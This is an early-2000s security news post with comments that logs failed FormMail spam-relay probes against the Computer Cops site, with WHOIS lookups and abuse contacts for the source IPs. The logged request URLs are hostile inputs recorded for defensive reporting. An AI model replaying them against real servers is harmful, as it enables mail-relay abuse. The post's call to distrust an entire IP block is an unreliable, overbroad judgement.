New User? Need help? Click here to register for free! Registering removes the advertisements.

Computer Cops
image image image image image image image image
Donations
If you found this site helpful, please donate to help keep it online
Don't want to use PayPal? Try our physical address
image
Prime Choice
· Head Lines
· Advisories (All)
· Dnld of the Week!
· CCSP News Ltrs
· Find a Cure!
· Ian T's (AR 20)
· Marcia's (QA2)
· Bill G's (CO9)
· Paul's (AR 5)
· Robin's (AR 1)
· Ian T's Archive
· Marcia's Archive
· Bill G's Archive
· Paul's Archive
· Robin's Archive
image
Security Central
· Home
· Wireless
· Bookmarks
· CLSID
· Columbia
· Community
· Downloads
· Encyclopedia
· Feedback (send)
· Forums
· Gallery
· Giveaways
· HijackThis
· Journal
· Members List
· My Downloads
· PremChat
· Premium
· Private Messages
· Proxomitron
· Quizz
· Recommend Us
· RegChat
· Reviews
· Search (Topics)
· Sections
· Software
· Statistics
· Stories Archive
· Submit News
· Surveys
· Top
· Topics
· Web Links
· Your Account
image
CCSP Toolkit
· Email Virus Scan
· UDP Port Scanner
· TCP Port Scanner
· Trojan TCP Scan
· Reveal Your IP
· Algorithms
· Whois
· nmap port scanner
· IPs Banned [?]
image
Survey
How much can you give to keep Computer Cops online?
$10 up to $25 per year?
$25 up to $50 per year?
$10 up to $25 per month?
$25 up to $50 per month?
More than $50 per year?
More than $50 per month?
One time only?
Other (please comment)



Results
Polls

Votes: 565
Comments: 14
image
Translate
English German French
Italian Portuguese Spanish
Chinese Greek Russian
image
image crkatk: Site: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block image
Crack Attack
Due to recent PHP-Nuke sites being successfully attacked as noticed here and reported here, I checked my logs today and noticed a slice of some of the following crack attempts that were not successful.
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:56 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=ro
[email protected] HTTP/1.0 302 358
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:57 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=
[email protected] HTTP/1.0 302 360
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=go
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:59 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.pl&message=ro
[email protected] HTTP/1.0 302 358
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.pl&message=rockstar&recipient=good
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:59 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.cgi&message=
[email protected] HTTP/1.0 302 360
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.cgi&message=rockstar&recipient=go
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1


PHPNuke.org was cracked, but not due to PHP-Nuke itself. In this article are more reports of black hatters that appear to all be from the 200. IP block.. Brasil?

Checking SamSpade (source) the IP resolves to:

correo.cfired.org.ar

Here is the complete WHOIS for that IP:
Trying whois -h whois.arin.net 200.55.7.235

OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: ARROWROOT.ARIN.NET
NameServer: BUCHU.ARIN.NET
NameServer: CHIA.ARIN.NET
NameServer: DILL.ARIN.NET
NameServer: NS.LACNIC.ORG
NameServer: NS.DNS.BR
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
allocations to users in LACNIC region.
Please see http://www.lacnic.net/ for further details, or check the
WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2002-12-12

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3525
TechEmail: [email protected]

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3525
OrgTechEmail: [email protected]

# ARIN Whois database, last updated 2003-02-01 20:00
# Enter ? for additional hints on searching ARIN's Whois database.


Rest assured they will be contacted today linking back to this news article.

Lacnic's Contact Us page:
CONTACT US




LACNIC
Potosi 1517
Montevideo, 11500
Uruguay

Phone: (598) 2 6062822 - (598) 2 6015846
Fax - (598) 2 6015509
[email protected]

OPERATIONAL CENTER / REGISTRATION SERVICES
São Paulo, Brazil

Phone: (+55) 11 5509-3525 - From 8:30 am to 5:30 pm (GMT -4)
[email protected]

MEMBERSHIP
[email protected]

WEBMASTER
[email protected]

NETWORK ABUSE
[email protected]


If you are seeing these be sure to report it immediately. A copy of this text will also be sent to US Federal Agencies.

Links back to this article have been posted here, here, and here.

Note: No harm has been done. Be sure to also read more data here, and here to shore up your defenses.
Posted on Sunday, 02 February 2003 @ 16:26:13 EST by Paul
image

 
Login
Nickname

Password
· New User? ·
Click here to create a registered account.
image
Related Links
· TrackBack (0)
· PHP HomePage
· Microsoft
· PHP-Nuke
· HotScripts
· W3 Consortium
· Mozilla
· More about Crack Attack
· News by Paul
Most read story about Crack Attack:
Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block

image
Article Rating
Average Score: 4
Votes: 1

Please take a second and vote for this article:

Bad
Regular
Good
Very Good
Excellent

image
Options

Printer Friendly Page  Printer Friendly Page

Send to a Friend  Send to a Friend
image
"Login" | Login/Create an Account | 4 comments | _SEARCHDIS
Threshold
The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block (Score: 1)
by Paul  on Monday, 03 February 2003 @ 05:39:35 EST
(User Info | Send a Message | _JOURNAL) http://COMPUTERCOPS.BIZ
whois -h whois.lacnic.net 200.55.7.235

% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2003-02-03 08:38:45 (BRST -02:00)

inetnum: 200.55.7.232/29
status: reassigned
owner: Consejo Fed. de Inv.
ownerid: AR-CFIN-LACNIC
address: SAN MARTIN 871
address: Capital Federal, Buenos Aires 1111
country: AR
owner-c: OC198-ARIN
created: 20010716
changed: 20010716
inetnum-up: 200.55.0/18
source: ARIN-LACNIC-TRANSITION

nic-hdl: OC198-ARIN
person: O'Flaherty Christian
e-mail: [email protected]
address: Impsat
address: Alferez Pareja 256
address: Buenos Aires, C1107BJD
country: AR
phone: 54 11 4362 4240
source: ARIN-LACNIC-TRANSITION



Re: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block (Score: 1)
by Paul  on Tuesday, 04 February 2003 @ 03:13:57 EST
(User Info | Send a Message | _JOURNAL) http://COMPUTERCOPS.BIZ
Lately I just feel like posting snippets of these cracking attempts to alert the public of these idiots:

========================================
Request: 200.63.160.161 - - [Mon Feb 3 10:13:08 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0 302 298
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: es-ar
Cache-Control: max-age=259200
Connection: keep-alive
Cookie: lang=english; anno=MDMwMjAzMTAxMjIxOg%3D%3D
Host: www.computercops.biz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.1 lapetisa.abackcomputers.ods.org:3128 (Squid/2.4.STABLE3)
X-Forwarded-For: 192.168.22.65

HTTP/1.0 302 Found
Location: http://www.computercops.biz/modules.php?name=News&file=article&sid=590&mode=thread&order=0&thold=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 196.30.134.10 - - [Tue Feb 4 00:50:11 2003] GET /cgi-bin/formmail.pl HTTP/1.0 302 227
Handler: cgi-script
----------------------------------------
GET /cgi-bin/formmail.pl HTTP/1.0
Cache-Control: max-stale=0
Connection: Keep-Alive
Host: www.COMPUTERCOPS.org
Referer: http://www.COMPUTERCOPS.org/

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/formmail.pl
Connection: close
Content-Type: text/html; charset=iso-8859-1



Re: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block (Score: 1)
by Paul  on Tuesday, 04 February 2003 @ 15:27:31 EST
(User Info | Send a Message | _JOURNAL) http://COMPUTERCOPS.BIZ
Another slice another IP:

========================================
Request: 68.66.19.85 - - [Tue Feb 4 08:13:58 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=go HTTP/1.0 302 298
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=go HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Host: www.computercops.biz
Pragma: no-cache
User-Agent: Mozilla/3.0 (compatible)

HTTP/1.0 302 Found
Location: http://www.computercops.biz/modules.php?name=News&file=article&sid=590&mode=thread&order=0&thold=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 68.66.19.85 - - [Tue Feb 4 08:17:54 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0 302 298
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Host: www.computercops.biz
Pragma: no-cache
User-Agent: Mozilla/3.0 (compatible)

HTTP/1.0 302 Found
Location: http://www.computercops.biz/modules.php?name=News&file=article&sid=590&mode=thread&order=0&thold=0
Connection: close
Content-Type: text/html; charset=iso-8859-1


Home · Topics · Submit News · Top 10
This entire site, Cops Themes, and Computer Cops are © 2002 - 2004 Computer Cops, LLC. All rights reserved.
You can syndicate our news using the file RSS 0.91, ultramode.txt, or RSS 1.0.
Acceptable Use Policy. Use signifies your agreement.
Engine Copyright © 2002 by PHP-Nuke, GNU/GPL Licensed. ICRA Member.
Paul Laudanski, Member of Computer Cops, LLC
Server Load: 634 pages served in previous 5 minutes. Page Generation: 0.449 seconds.